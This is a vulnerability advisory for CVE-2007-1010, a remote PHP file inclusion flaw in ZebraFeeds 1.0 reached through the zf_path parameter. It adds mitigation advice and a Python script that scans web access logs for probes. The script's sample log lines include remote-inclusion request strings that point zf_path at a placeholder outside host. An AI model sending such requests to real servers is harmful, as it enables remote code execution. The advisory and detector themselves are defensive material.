PT-2007-2438 · Zebrafeeds · Zebrafeeds

The De@Th · Published 2007-02-21 · Updated 2017-10-11 · CVE-2007-1010

CVSS v2.0: 6.8 (Medium)
Vector: AV:N/AC:M/Au:N/C:P/I:P/A:P
Name of the Vulnerable Software and Affected Versions: ZebraFeeds version 1.0
Description: The issue allows remote attackers to execute arbitrary PHP code when register_globals is enabled. This is achieved by providing a URL in the zf_path parameter to specific API endpoints, such as "aggregator.php" and "controller.php" in the "newsfeeds/includes/" directory.
Recommendations: For ZebraFeeds version 1.0, consider disabling the register_globals setting to prevent exploitation. Additionally, restrict access to the "aggregator.php" and "controller.php" files in the "newsfeeds/includes/" directory until a fix is available. Avoid using the zf_path parameter in the affected API endpoints until the issue is resolved.
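To check whether the two affected files have been probed while the restrictions above are put in place, web access logs can be searched for requests that set the parameter directly. The following is an added example, not part of the original advisory or of ZebraFeeds: it assumes common/combined log format, assumes the parameter appears in query strings as `zf_path`, and runs over constructed sample lines.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# The two scripts named in the advisory.
SCRIPTS = ("newsfeeds/includes/aggregator.php", "newsfeeds/includes/controller.php")
PARAM = "zf_path"  # assumption: exact, case-sensitive name as seen in query strings
REMOTE = re.compile(r"^\s*[a-z][a-z0-9+.\-]*://", re.I)  # value starts with scheme://
REQUEST = re.compile(r'"[A-Z]+ (\S+) HTTP/[\d.]+"')      # request line in the log entry

# Constructed sample log lines (documentation addresses, reserved host names).
SAMPLE_LOG = """\
192.0.2.10 - - [21/Feb/2007:10:00:01 +0000] "GET /newsfeeds/index.php HTTP/1.1" 200 5120
192.0.2.44 - - [21/Feb/2007:10:02:17 +0000] "GET /newsfeeds/includes/aggregator.php?zf_path=http://host.example.invalid/x.txt%3F HTTP/1.1" 200 312
192.0.2.44 - - [21/Feb/2007:10:02:19 +0000] "GET /newsfeeds/includes/controller.php?zf_path=hTTp%3A%2F%2Fhost.example.invalid%2Fx HTTP/1.0" 200 298
192.0.2.51 - - [21/Feb/2007:10:05:40 +0000] "GET /newsfeeds/includes/controller.php?zf_path=../ HTTP/1.1" 200 77
192.0.2.60 - - [21/Feb/2007:10:06:02 +0000] "GET /newsfeeds/includes/aggregator.php HTTP/1.1" 200 0
"""

def classify(line):
    """Return 'remote-url', 'param-set' or None for one access-log line."""
    m = REQUEST.search(line)
    if not m:
        return None
    url = urlsplit(m.group(1))
    # Normalise the path: decode, collapse repeated slashes, ignore case.
    path = re.sub(r"/+", "/", unquote(url.path)).lower()
    if not any(script in path for script in SCRIPTS):
        return None
    verdict = None
    for name, value in parse_qsl(url.query, keep_blank_values=True):
        if name != PARAM:
            continue
        # parse_qsl decodes once; the second unquote catches double-encoding.
        if REMOTE.match(unquote(value)):
            return "remote-url"
        verdict = "param-set"  # caller-supplied value, still worth reviewing
    return verdict

def scan(log_text):
    """Return (line_number, verdict) for every flagged line."""
    hits = []
    for number, line in enumerate(log_text.splitlines(), 1):
        verdict = classify(line)
        if verdict:
            hits.append((number, verdict))
    return hits

if __name__ == "__main__":
    for number, verdict in scan(SAMPLE_LOG):
        print(number, verdict)
```

Access logs normally record only the query string, so a value sent in a POST body or cookie will not show up in this scan.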

Exploit

Fix


Related identifiers

CVE-2007-1010

Affected products

Zebrafeeds